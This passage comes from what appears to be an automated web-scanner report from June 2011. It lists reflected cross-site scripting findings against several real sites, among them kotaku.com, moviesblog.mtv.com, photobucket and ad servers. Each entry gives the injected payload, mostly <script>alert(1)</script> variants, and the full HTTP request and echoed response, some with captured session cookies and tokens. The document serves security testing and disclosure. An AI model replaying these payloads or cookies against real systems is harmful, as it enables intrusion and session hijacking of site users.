GET /cmadj/cm.mtv80134'-alert(1)-'42c7e873823/ent_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=388700;cmpgurl=http%253A//view.atdmt.com/PTR/iview/240321409/direct%253Bwi.1%253Bhi.1/01%253Frelocate%253Dhttp%253A//viacom.adbureau.net/AFTRSERVER/hserver//acc_random%253D379297/site%253Dmtv.mtvi/aamsz%253D728x90/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 9197
Date: Mon, 13 Jun 2011 11:23:38 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 14-Jun-2011 11:23:38 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10305963894_1307964218","http://ib.adnxs.com/ptj?member=311&inv_code=cm.mtv80134'-alert(1)-'42c7e873823&size=728x90&imp_id=cm-10305963894_1307964218,120221f8320d7dc&referrer=http%3A%2F%2Fview.atdmt.com%2FPTR%2Fiview%2F240321409%2Fdirect%3Bwi.1%3Bhi.1%2F01%3Frelocate%3Dhttp%3A%2F%2Fviacom.adbureau.net%2F
...[SNIP]...

4.213. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/ent_010111

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 82536(a)c56b8fd4f37 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /cmadj/cm.mtv/ent_010111;sz=82536(a)c56b8fd4f37 HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:37 GMT
Content-Length: 8923
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 14-Jun-2011 11:23:37 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:37 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:37 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:37 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
pid=15",false);CollectiveMedia.addPixel("http://adadvisor.net/adscores/g.pixel?sid=9226553863",false);var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:82536(a)c56b8fd4f37,
uqid:bap_rnd,
cps:'cm,dx,wfm,idgt,bz'
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

4.214. http://kotaku.com/static/ad_iframe.php [rand parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/ad_iframe.php

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480ff'%3balert(1)//efd80a83264 was submitted in the rand parameter. This input was echoed as 480ff';alert(1)//efd80a83264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732480ff'%3balert(1)//efd80a83264&nocache=true HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1; __utmz=153847911.1307963900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153847911.155554980.1307963900.1307963900.1307963900.1; __utmc=153847911; __utmb=153847911.1.10.1307963900; __g_iut=1307963904980; _chartbeat2=e1yns63z64wh592f

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:25 GMT
Server: Apache
X-Cookie-Set: 1
Cache-Control: max-age=30
Pragma: no-cache
Expires: 1307964265
ETag: 619618
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM70 - Request took D=2565 at t=1307964265005240 on site kotaku.com (live)
GawkerApplication: ganja
ntCoent-Length: 1352
Content-Type: text/html
Content-Length: 1352


<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<script type="text/javascript">
       if (!window.parent.document.getElementById('ad_iframe_45018732480ff';alert(1)//efd80a83264')) {
           document.write('</body>
...[SNIP]...

4.215. http://kotaku.com/static/ad_iframe.php [script_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/ad_iframe.php

Issue detail

The value of the script_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec9d"><script>alert(1)</script>d4c494181c3 was submitted in the script_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F6ec9d"><script>alert(1)</script>d4c494181c3&rand=45018732&nocache=true HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1; __utmz=153847911.1307963900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153847911.155554980.1307963900.1307963900.1307963900.1; __utmc=153847911; __utmb=153847911.1.10.1307963900; __g_iut=1307963904980; _chartbeat2=e1yns63z64wh592f

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:24 GMT
Server: Apache
X-Cookie-Set: 1
Cache-Control: max-age=30
Pragma: no-cache
Expires: 1307964264
ETag: 786599
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM38 - Request took D=668 at t=1307964264792603 on site kotaku.com (live)
GawkerApplication: ganja
Cteonnt-Length: 1367
Content-Type: text/html
Content-Length: 1367


<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<script type="text/javascript" src="http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?6ec9d"><script>alert(1)</script>d4c494181c3">
...[SNIP]...

4.216. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.photobucket.com
Path:	/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dca3"><script>alert(1)</script>93593d9c9b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/recent/Smirk_Dog/GIFS9dca3"><script>alert(1)</script>93593d9c9b1/MacSigDance.gif HTTP/1.1
Host: media.photobucket.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 13 Jun 2011 11:03:41 GMT
Server: Apache
Set-Cookie: flash=deleted; expires=Sun, 13-Jun-2010 11:03:40 GMT; path=/; domain=.photobucket.com
Set-Cookie: daily=referer%3Dwww.mavsmoneyball.com; expires=Tue, 14-Jun-2011 11:03:42 GMT; path=/; domain=.photobucket.com
Vary: Accept-Encoding
Content-Length: 1723
Connection: close
Content-Type: text/html


<div id="zoomedOffsetContainer" style="padding-left: 0px;">
<div id="containerZoomedImage" class="mediaWrapper" style="display: none; width: 600px;">
...[SNIP]...
<img id="fullImage" src="http://img.photobucket.com/albums/v163/Smirk_Dog/GIFS9dca3"><script>alert(1)</script>93593d9c9b1/MacSigDance.gif" alt="MacSigDance.gif " GALLERYIMG="no">
...[SNIP]...

4.217. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moviesblog.mtv.com
Path:	/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdc87</script><script>alert(1)</script>ad7096f9d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011cdc87</script><script>alert(1)</script>ad7096f9d0/06/12/game-of-thrones-spoiler-death-sean-bean/ HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://moviesblog.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:22:46 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 32513
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:32:46 GMT
Date: Mon, 13 Jun 2011 11:22:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/moviesblog/2011cdc87</script><script>alert(1)</script>ad7096f9d0/06/12/game-of-thrones-spoiler-death-sean-bean/',
    channel: 'BLOGS',
    hier1: 'BLOGS/moviesblog/2011cdc87</script>
...[SNIP]...

4.218. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moviesblog.mtv.com
Path:	/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload becb4</script><script>alert(1)</script>6a73108e545 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/06becb4</script><script>alert(1)</script>6a73108e545/12/game-of-thrones-spoiler-death-sean-bean/ HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://moviesblog.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:22:53 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 32515
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:32:53 GMT
Date: Mon, 13 Jun 2011 11:22:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/moviesblog/2011/06becb4</script><script>alert(1)</script>6a73108e545/12/game-of-thrones-spoiler-death-sean-bean/',
    channel: 'BLOGS',
    hier1: 'BLOGS/moviesblog/2011/06becb4</script>
...[SNIP]...

4.219. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moviesblog.mtv.com
Path:	/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc464</script><script>alert(1)</script>15109493cfc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/06/12dc464</script><script>alert(1)</script>15109493cfc/game-of-thrones-spoiler-death-sean-bean/ HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://moviesblog.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:22:59 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 32515
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:32:59 GMT
Date: Mon, 13 Jun 2011 11:22:59 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/moviesblog/2011/06/12dc464</script><script>alert(1)</script>15109493cfc/game-of-thrones-spoiler-death-sean-bean/',
    channel: 'BLOGS',
    hier1: 'BLOGS/moviesblog/2011/06/12dc464</script>
...[SNIP]...

4.220. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moviesblog.mtv.com
Path:	/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b48</script><script>alert(1)</script>216341d2f3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/06/12/game-of-thrones-spoiler-death-sean-beanc3b48</script><script>alert(1)</script>216341d2f3b/ HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://moviesblog.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:23:06 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 32515
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:33:06 GMT
Date: Mon, 13 Jun 2011 11:23:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/moviesblog/2011/06/12/game-of-thrones-spoiler-death-sean-beanc3b48</script><script>alert(1)</script>216341d2f3b/',
    channel: 'BLOGS',
    hier1: 'BLOGS/moviesblog/2011/06/12/game-of-thrones-spoiler-death-sean-beanc3b48</script>
...[SNIP]...

4.221. http://moviesblog.mtv.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moviesblog.mtv.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7407c</script><script>alert(1)</script>af1ce188009 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico7407c</script><script>alert(1)</script>af1ce188009 HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; mbox=check#true#1307963954|session#1307963884869-321358#1307965754; __cs_rr=1; __utma=191159094.1881519971.1307963907.1307963907.1307963907.1; __utmc=191159094; __utmz=191159094.1307963907.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_nr=1307963913916; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmb=191159094; s_ppv=27; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://moviesblog.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:25:43 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 32435
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:35:44 GMT
Date: Mon, 13 Jun 2011 11:25:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/moviesblog/favicon.ico7407c</script><script>alert(1)</script>af1ce188009',
    channel: 'BLOGS',
    hier1: 'BLOGS/moviesblog/favicon.ico7407c</script>
...[SNIP]...

4.222. http://ox-d.sbnation.com/w/1.0/ajs [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ox-d.sbnation.com
Path:	/w/1.0/ajs

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0654"%3balert(1)//a21b275695e was submitted in the o parameter. This input was echoed as b0654";alert(1)//a21b275695e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /w/1.0/ajs?o=700820584b0654"%3balert(1)//a21b275695e&auid=20336&tid=2,8,17&res=1920x1200x32&plg=swf,sl,shk&ch=UTF-8&tz=300&c.team=dallas-mavericks&c.entry_type=story&c.region=dallas&url=http%3A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship&cb=700820584&cc=1&mi=5cb31120-2bcf-44f1-b2a9-32c6ee29a288&mn=0&mc=1 HTTP/1.1
Host: ox-d.sbnation.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-853758375-1305746649439; OAID=4b24811b2bad0c1235f0fb9f9e199204; OX_u=bd25819b-0149-45fa-ad24-5911a28c4ab5

Response

HTTP/1.1 200 OK
Set-Cookie: OX_u=bd25819b-0149-45fa-ad24-5911a28c4ab5; Version=1; Expires=Tue, 12 Jun 2012 11:01:58 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Mon, 13 Jun 2011 11:01:58 GMT
Content-Type: text/javascript
Content-Length: 1013
Cache-Control: private, max-age=0, no-cache
Connection: close

(function(){
OX.addCreative("700820584b0654";alert(1)//a21b275695e","20336","<a href='http://ox-d.sbnation.com/w/1.0/rc?ts=0c2lkPTMyNzN8YXVpZD0yMDMzNnxhaWQ9Mzc4ODd8cHViPTM5NzB8bGlkPTI2ODIxfHU9MXx0PTF8cmlkPWMzNWY2NGI2LTA3YTAtNGFkMy05OTQxLWI5N2Y4NDgyNTdkNHxvaWQ9OTQ0NHx
...[SNIP]...

4.223. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/63975/3848554c08824c2e6b4e5963f6d2d7e2

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b463b<script>alert(1)</script>d7c1406750d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63975/3848554c08824c2e6b4e5963f6d2d7e2?callback=BF_PARTNER.gate_responseb463b<script>alert(1)</script>d7c1406750d&cb=4183 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Mon, 20 Jun 2011 11:23:21 GMT
